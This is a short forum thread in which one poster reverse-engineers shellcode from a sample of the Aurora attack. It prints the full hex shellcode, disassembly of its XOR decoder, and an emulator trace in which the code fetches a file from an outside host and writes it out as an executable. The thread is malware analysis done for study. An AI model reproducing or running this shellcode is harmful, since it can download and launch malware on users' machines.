Results 1 to 3 of 3

Thread: Aurora Example

  1. #1
    051r15
    Guest

    Aurora Example

    Having got a sample of the Aurora attack I'm trying to examine the shellcode.

    http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js

    9090eb195b4b9033c990807b01e97501c366b97b0480340bd8e2faeb05e8e2ffffff3139fdffd887bc79fdfffdff5398d453 a8c47553b0d0532fb2d78130fdfffdff483a20b0ebeafdffb08dabbdaa8c539ed430fdfffdff5330fdff8130fdfffdff3a21 b0b7fdffd8b0adaab4b58c539ed43008fdffd85330b2d981309afdffd83a21b0b4ebfdffb0abb0bdb48c539ed430fdfffdff 5330fdff8130fdfffdff3a215934fdfffdff5304591bfdfffdfffdffb2c28bb2d8278e9ceb189858fdffd8ad21515e48fdff d81ffdff84b9f6bd1f9cfdffa0bdfdffeb1189898b8f89eb18539e983086fdffd85bfdffd75dfdfffdfffdfffdfffdfffdff fdfffdfffdff188b539efc30fdfffdff5b2027d75c86fdffd8519eb8fdff88278ef0519ebc535e48fdffd81ffdff84baf6bd 1f9cfdffa0bdfdfffdfffdfffdfffdfffdfffdfffdff988b539efc30fdfffdff5b2027d75cc4fdffd8515e5cfdffd8514654 fdffd8539eb8fdfffdfffdff539eb888278ee01f9ea8fdfffdff1f9efdfffdffd859fdfffdffd8eb035386bcfdff559ea888 fdfffdffd88f27aeb827fdffeb11fdfffdffd858a4d7274dacd458a4d727d8acdd58acd7274d3a33531bfdfffdffd85bfdff fdff5186a8b2d8559eac8827aea88f276e5cfdffd8278ee85933fdfffdff5b23d8a77d27aeb8278eec276e5cfdffd8278eec 535efdfffdff5346fdffd8d81fdcdb84b9f6bd8b278ef4536654fdffd8535e48fdffd81ffdff84baf6bd5934fdfffdff5304 fdfffdffd88bfdfffdffd88ffdfffdff278ec45323eb18eb0359fdfffdffd853145b208ca5d051c4d95bfdff332b53145301 5b1bc8eb1888898b8888888888888f8888539ed0302ffdffd853a6e430ecfdffd830fdfffdffb0bbaeafd8b0abb0bcb78c53 9ed4306efdffd8519ee4bc79fdfffdff5578b8272727b2bd27aee4539ec83042fdffd8eb038b8b8b8b270830fdfffdff5934 fdfffdff53245b1fdc1fdfeaac49d41ffdffbb5109971f9fd078bd4f131f9fd4899862a71f9fc8e6c56ee11f9fcc60b10cc3 1f9fc066a7be781f9fc42471ef751f9ff840d2c820bc79e8fdffd85398d453a8c47553b0d0532f518ebcfdff8130fdfffdff 483a20b0ebeafdffb08dabbdaa8cfdff30cafdffd85330b2dd81305cfdffd83a21eb278f278edc58e03058e031adc959fdff 48484848acd053278d533455fdff273830e0fdffd81b58e03058e031adc959a0dd48484848ac3fb0d0d2fdff5598dd273830 fdfffdff1b30fdfffdff60c9fdff581afdfffdff801b302127272783fdff6051fdffbe1ffdff27381b8b53048bb298b0d8c8 fdff8f539ef8305e272727801b898e53ade453acf6a0db2d8e53aef8db2deb119199fdff1deb03d766c8e20eacd01913fdff 02983329e3c7ad3f865386fcdb05be53d4935386fdff0553dc53db1d7386811b30c22427276a2a3a2c6aeed7cb2890a3e5ea ac49d45d077763bb510997899862fdff4afaa8c67cbc374bea3c4c56cbd274a1e13e401c55c7ac8fbed5279b66740340d2c8 20580e7742238bcdbeb0acaca8e2f7f7bcbdb5b7e9f6beaca8b9bbbbbdababf6bbbbf7bcbdb5b7f7b9bcf6b2a8bfd800

    This on execution gives

    401020 nop
    401021 nop
    401022 jmp 1d
    40103d call 401024
    >>>>>>>>>>>>>>>>>>>>>>>
    401024 pop ebx
    401025 dec ebx
    401026 nop
    401027 xor ecx, ecx
    401029 nop
    40102a cmp byte ptr [ebx+01], e9
    40102e jnz 11
    401031 mov cx, 47b
    401035 xor byte ptr [ecx+ebx], d8
    401039 loop 15
    ... which xors a region with d8 then jumps into this area
    40103b jmp 401042
    however this turns out to be a jump out of the routine, to a non code area which can't be right
    401042 jmp 272608

    The xoring looks correct because the string http://demo1.ftpaccess.cc/demo/ad.jpg is revealed presumably as a param to a downloader - what have I missed?
    I promise that I have read the FAQ and tried to use the Search to answer my question.

  2. #2
    051r15
    Guest
    Ah ha! I can see what I've done wrong I've corrupted the shellcode! it now looks like
    a Kernel32 search.
    I promise that I have read the FAQ and tried to use the Search to answer my question.

  3. #3
    051r15
    Guest
    401380 KERNEL32.DLL.LoadLibraryA("User32")->1027b4d
    401380 KERNEL32.DLL.LoadLibraryA("urlmon")->ab50cd
    401380 KERNEL32.DLL.LoadLibraryA("shell32")->15eb0a9
    4010d7 SHELL32.SHGetSpecialFolderPathA(0,12ff20,1a,0)->1
    401380 URLMON.URLDownloadToFileA(0,"http://demo1.ftpaccess.cc/demo/ad.jpg","\a.exe",0,0)->0
    401380 KERNEL32.DLL.CreateFileA("\a.exe",c0000000,2,0,3,0,0)->a26b3429
    401139 KERNEL32.DLL.GetFileSize(a26b3429,0)->500
    401380 KERNEL32.DLL.CreateFileA("\b.exe",40000000,0,0,2,0,0)->a2794baa
    40118e KERNEL32.DLL.SetFilePointer(a26b3429,0,0,0)->1
    4011b9 KERNEL32.DLL.ReadFile(a26b3429,401675,400,40149d,0)->1
    The seems to look for a d5 byte
    4011bc xor ecx, ecx sp[12fea0][0|0|0|0] ebp[15eb0a9]eax[1]ebx[500]ecx[0]edx[0]esi[40142d]edi[401675]z[1]c[0]s[1]
    4011be mov ecx, 400 sp[12fea0][0|0|0|0] ebp[15eb0a9]eax[1]ebx[500]ecx[400]edx[0]esi[40142d]edi[401675]z[1]c[0]s[1]
    4011c3 cmp byte ptr [ecx+edi-01], ffffffffffffff95 sp[12fea0][0|0|0|0] ebp[15eb0a9]eax[1]ebx[500]ecx[400]edx[0]esi[40142d]edi[401675]z[0]c[1]s[1]
    4011c8 jz 1b6 sp[12fea0][0|0|0|0] ebp[15eb0a9]eax[1]ebx[500]ecx[400]edx[0]esi[40142d]edi[401675]z[0]c[1]s[1]
    4011ca cmp byte ptr [ecx+edi-01], 00 sp[12fea0][0|0|0|0] ebp[15eb0a9]eax[1]ebx[500]ecx[400]edx[0]esi[40142d]edi[401675]z[1]c[0]s[0]
    4011cf jz 1b6 sp[12fea0][0|0|0|0] ebp[15eb0a9]eax[1]ebx[500]ecx[400]edx[0]esi[40142d]edi[401675]z[1]c[0]s[0]
    4011d6 loop 1a3
    I promise that I have read the FAQ and tried to use the Search to answer my question.

Similar Threads

  1. Hex-Rays against Aurora
    By Hex Blog in forum Blogs Forum
    Replies: 5
    Last Post: January 21st, 2010, 16:17

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •